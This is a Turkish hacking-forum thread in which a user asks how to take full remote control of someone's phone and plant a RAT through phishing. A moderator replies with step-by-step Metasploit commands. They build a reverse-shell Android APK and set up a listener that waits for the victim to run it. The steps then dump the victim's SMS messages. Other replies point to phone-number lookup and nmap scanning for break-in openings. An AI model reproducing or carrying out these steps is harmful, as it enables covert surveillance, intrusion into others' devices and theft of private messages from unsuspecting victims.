PC Üzerinden Telefon Olan Bir Cihaza Tam Erişim

mustehzi

Üye
29 Eki 2018
111
8
Mahsûsa
PC üzerinden hedef telefon üzerinde tam erişim sahibi olup verileri nasıl kendi bilgisayarımıza çekebiliriz veyahut telefonu izleyebiliriz? Phishing yolu ile karşı tarafa RAT atacaksam hangi toolları kullanabilir, işimi nasıl halledebilirim? Yeşillendirebilecek olan varsa çok memnun kalırım.
 

Taha'

Moderatör
30 Kas 2018
609
676
Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

Komut ; msfpayload android/meterpreter/reverse_tcp LHOST= ip adresiniz (ifconfig komutu ile öğrenebilirsiniz LPORT= hangi port üzerinden yapmak istiyorsanız R > /root/Desktop/isim.apk . ( nereye kaydetmek istiyorsanız path bölümünde orayı belirtiyorsunuz. ) ve dosya oluşturuldu bakalım masa üstümüze.

rM4ypV.png


Adım 2 : msfconsole komutu ile exploit aracımız çalıştırıyoruz ve aşağıdaki komutu yazıyoruz .

Komut ; use multi/handler .

6PBMG3.png


Adım 3 : Burada ise aşağıdaki kodları yazıyoruz .

Komut ;

> set payload android/meterpreter/reverse_tcp
> show options
> set LHOST 192.168.1.1 ( ip adresinizi yazıyorsunuz linux makinanızın)
> set LPORT 4444 ( belirlediğiniz port adresini yazıyorsunuz )
> exploit ( kurbanın yazılımı çalıştırması ile root satırına geçmeyi bekliyoruz.)

v5Gylp.png


Adım 4 : Ve kurban yazılımı çalıştırarak bize yetki göndermiş durumda

XkGljj.png


Adım 5 : Burada ise telefon içerisinde yapılabilecek bütün işlemerin komutlarını görüntülemek için help komutunu kullanıyoruz . Sağ tarafta hangi komutun ne işe yaradıgını bize açıklamakta.

RkAG4a.png


Adım 6 : Örnek olarak telefondaki SMSlere bakalım . Bunun için dump_sms komutunu kullanıyoruz.

v5GyDp.png


Adım 7 : Dosyamızı root klasörüne kaydetiyor. Şimdi ismine göre hangi dosyaysa açalım.

rM4yDz.png


Adım 8 : Ve SMSleri görüntüledik . Kim göndermiş , kurban kime göndermiş , numara , tarih , açıklama , mesaj vb ayrıntıları görüntüledik .

WkzozE.png
Merhaba Degerli Üye

Kali Linux üzerinden yapılan bu saldırı türü isini görebilir iyi forumlar.
 

GMR148

Yeni üye
9 Kas 2021
32
12
Merhaba
Kali linux ile birlitke yüklü gelen Metasploit Aracını araştırıp iyicene öğrenmen gerek. Ayrıca phoneinfoga diye bir araç var telefon numarasını yazıp bilgi alıyorsun
eğer ip adresini bulursanda nmap ile taratıp sızabilmen için gerekli açıkları bulabilirsin...
 

mustehzi

Üye
29 Eki 2018
111
8
Mahsûsa
Teşekkür ederim dostlar, dediğiniz araca bir göz atacağım. Fakat üstteki konuda anlamadığım bir kısım var, yanlış değilsem karşı tarafın bize tam erişim vereceği bir dosya hazırlayıp ona atacağız değil mi?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.